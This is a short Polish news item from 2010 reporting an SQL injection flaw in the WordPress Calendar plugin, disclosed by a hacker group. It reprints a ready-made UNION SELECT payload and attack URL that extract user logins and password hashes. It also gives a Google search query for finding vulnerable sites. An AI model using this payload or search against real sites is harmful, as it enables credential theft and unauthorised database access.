31 stycznia 2010

WordPress Calendar Plugin podatny na atak Sql Injection!

Grupa hakerów określająca się mianem Sec Attack Team opublikował dziś szczegółowe informacje dotyczące luki odkrytej we wtyczce WordPress Calendar. Znaleziony błąd pozwala na wykonanie ataku typu Sql Injection i w konsekwencji nieuprawniony dostęp do bazy danych.

Libańska grupa Sec Attack Team przedstawiła następujące możliwości wykorzystania podatności wtyczki:
  • www.site.com/?event_id=[kod Sql]
  • www.site.com/Path/?event_id=[kod Sql]
Sam kod pozwalający na wyciągnięcie z bazy danych informacji o poświadczeniach użytkowników wygląda następująco:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Przykładowy atak może więc przyjąć postać następującego odwołania do serwisu internetowego:
http://server/calendar?event_id=-27+union+select+ 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Warto również nadmienić, że do odnalezienia witryn podatnych na ten konkretny atak może posłużyć odpowiednio skonstruowane zapytanie do wyszukiwarki Google, w postaci "powered by WordPress" inurl:"/?event_id=". Zapytanie takie zwraca na chwilę obecną 2240 wyników.